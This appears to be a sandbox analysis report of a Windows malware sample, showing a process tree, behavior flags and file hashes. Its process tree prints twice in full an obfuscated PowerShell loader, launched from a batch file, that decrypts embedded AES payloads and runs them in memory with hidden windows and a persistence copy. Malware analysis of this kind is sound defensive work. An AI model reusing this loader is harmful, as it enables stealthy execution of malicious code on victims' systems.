C:\Windows\System32\svchost.exe  [depth 1, PID 2532]
  command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\sysmon.exe  [depth 1, PID 2576]
  command: C:\Windows\sysmon.exe
C:\Windows\system32\svchost.exe  [depth 1, PID 2588]
  command: C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\system32\svchost.exe  [depth 1, PID 2616]
  command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
  C:\Windows\system32\wbem\WMIADAP.EXE  [depth 2, PID 1380]
    command: wmiadap.exe /R /T
    - Drops file in System32 directory
C:\Windows\system32\svchost.exe  [depth 1, PID 2624]
  command: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\System32\svchost.exe  [depth 1, PID 2632]
  command: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe  [depth 1, PID 808]
  command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\wbem\unsecapp.exe  [depth 1, PID 3080]
  command: C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\Explorer.EXE  [depth 1, PID 3372]
  command: C:\Windows\Explorer.EXE
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  C:\Windows\system32\cmd.exe  [depth 2, PID 3120]
    command: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\hand.bat"
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\cmd.exe  [depth 3, PID 4308]
      command: cmd.exe /c echo function iuYgv($leKgl){ $jPJwb=[System.Security.Cryptography.Aes]::Create(); $jPJwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $jPJwb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $jPJwb.Key=[System.Convert]::FromBase64String('uEpqIWQRyvODISCHGUQfxzSWFesSqTmCOTn7Muaq1uk='); $jPJwb.IV=[System.Convert]::FromBase64String('II7XtEw/4tOoxMX0yT4prg=='); $kNTLM=$jPJwb.CreateDecryptor(); $whegU=$kNTLM.TransformFinalBlock($leKgl, 0, $leKgl.Length); $kNTLM.Dispose(); $jPJwb.Dispose(); $whegU;}function zpxNq($leKgl){ Invoke-Expression '$kWPKo=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$leKgl);'.Replace('*', ''); Invoke-Expression '$UAPJw=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$SDRXH=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($kWPKo, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $SDRXH.CopyTo($UAPJw); $SDRXH.Dispose(); $kWPKo.Dispose(); $UAPJw.Dispose(); $UAPJw.ToArray();}function efQtH($leKgl,$kxxMo){ Invoke-Expression '$ECSjU=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$leKgl);'.Replace('*', ''); Invoke-Expression '$iUybu=$ECSjU.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$iUybu.*I*n*v*o*k*e*($null, $kxxMo);'.Replace('*', '');}$bdjtW = 'C:\Users\Admin\AppData\Local\Temp\hand.bat';$host.UI.RawUI.WindowTitle = $bdjtW;$sWPvP=[System.IO.File]::ReadAllText($bdjtW).Split([Environment]::NewLine);foreach ($fLYEN in $sWPvP) { if ($fLYEN.StartsWith('ECVXS')) { $GELOT=$fLYEN.Substring(5); break; }}$XQqqI=[string[]]$GELOT.Split('\');Invoke-Expression '$gOc = zpxNq (iuYgv ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($XQqqI[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$saB = zpxNq (iuYgv ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($XQqqI[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$UaX = zpxNq (iuYgv ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($XQqqI[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');efQtH $gOc $null;efQtH $saB $null;efQtH $UaX (,[string[]] (''));
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  [depth 3, PID 4800]
      command: powershell.exe -WindowStyle Hidden
      - Suspicious use of NtCreateUserProcessOtherParentProcess
      - Command and Scripting Interpreter: PowerShell
      - Suspicious use of SetThreadContext
      - Drops file in Windows directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      C:\Windows\System32\cmd.exe  [depth 4, PID 4724]
        command: "C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\AppData\Local\Temp\hand.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat
        - Drops file in Windows directory
      C:\Windows\system32\cmd.exe  [depth 4, PID 2380]
        command: C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
        C:\Windows\system32\cmd.exe  [depth 5, PID 3692]
          command: cmd.exe /c echo function iuYgv($leKgl){ $jPJwb=[System.Security.Cryptography.Aes]::Create(); $jPJwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $jPJwb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $jPJwb.Key=[System.Convert]::FromBase64String('uEpqIWQRyvODISCHGUQfxzSWFesSqTmCOTn7Muaq1uk='); $jPJwb.IV=[System.Convert]::FromBase64String('II7XtEw/4tOoxMX0yT4prg=='); $kNTLM=$jPJwb.CreateDecryptor(); $whegU=$kNTLM.TransformFinalBlock($leKgl, 0, $leKgl.Length); $kNTLM.Dispose(); $jPJwb.Dispose(); $whegU;}function zpxNq($leKgl){ Invoke-Expression '$kWPKo=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$leKgl);'.Replace('*', ''); Invoke-Expression '$UAPJw=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$SDRXH=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($kWPKo, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $SDRXH.CopyTo($UAPJw); $SDRXH.Dispose(); $kWPKo.Dispose(); $UAPJw.Dispose(); $UAPJw.ToArray();}function efQtH($leKgl,$kxxMo){ Invoke-Expression '$ECSjU=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$leKgl);'.Replace('*', ''); Invoke-Expression '$iUybu=$ECSjU.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$iUybu.*I*n*v*o*k*e*($null, $kxxMo);'.Replace('*', '');}$bdjtW = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $bdjtW;$sWPvP=[System.IO.File]::ReadAllText($bdjtW).Split([Environment]::NewLine);foreach ($fLYEN in $sWPvP) { if ($fLYEN.StartsWith('ECVXS')) { $GELOT=$fLYEN.Substring(5); break; }}$XQqqI=[string[]]$GELOT.Split('\');Invoke-Expression '$gOc = zpxNq (iuYgv ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($XQqqI[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$saB = zpxNq (iuYgv ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($XQqqI[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$UaX = zpxNq (iuYgv ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($XQqqI[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');efQtH $gOc $null;efQtH $saB $null;efQtH $UaX (,[string[]] (''));
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  [depth 5, PID 3504]
          command: powershell.exe -WindowStyle Hidden
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3496
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3548
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3896
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵PID:4016
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4068
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3636
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:4396
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵PID:4472
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:2560
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:2680
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1464
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:1644
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2032
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:2056
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3400
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:4184
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2844
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵PID:2252
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc1⤵
- Checks SCSI registry key(s)
PID:1420
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000110 0000008c1⤵PID:3152
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000104 0000008c1⤵PID:4800
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000e0 0000008c1⤵PID:3176
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 0000010c 0000008c1⤵PID:2904
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:4884
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000114 0000008c1⤵PID:3440
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000104 0000008c1⤵PID:4064
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000f0 0000008c1⤵PID:4348
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000118 0000008c1⤵PID:4664
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000c0 0000008c1⤵PID:3692
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000100 0000008c1⤵PID:3504
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000138 0000008c1⤵PID:3504
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000104 0000008c1⤵PID:5060
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 3KB
MD5: da760f8b53fcde92d67d6a610f0a4707
SHA1: 8c75b58f43455329c26520540461832bb90bffeb
SHA256: 1435d59e62d35d663ae54ca74cebd76a20b00380e3aa189b5d9567cdce7e7528
SHA512: 90e62d0fe87dfc7810cbf864d6a984f2b4c24add105f18d375221d2e0f7637f7a1c2e34afe92dcbfccb5a435e8dd6c4ca87a9d79a0fff29bd79a0ac21846e3e0

Filesize: 1KB
MD5: aedb4691b4a410acfe415bdf5817c0d9
SHA1: acdbec00fdeb48253388f5fa7439e26cbfdebe7d
SHA256: cc4e216fe6e882b37196e3a34129e18d386c2541c6527297b84e0350b212cb42
SHA512: 1712ac283dc4675ed270c62a0599302a2f3974e2668d1a6b04216b0819800b3e7bef124ba497767bd12c9f887ce34239eb4508a4220a6ba6e75393a370a8fc4e

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 7.0MB
MD5: 1a013c7ac90b58073895b26cae70def7
SHA1: 60c9c3294fc7ac3d336a478274f62f4818498230
SHA256: 698b1f0a35a76e57adef388612b29902f86f56983c772d7c6c17b4483c2be688
SHA512: c1bbb52e8546b352e041e944d7dfa158d5dc9a51b1628128d345e4a9e708871d7a1f5e59cc44a2c66f8dc9af81ec06e1b5105d5a7292497075564496f3b0ec75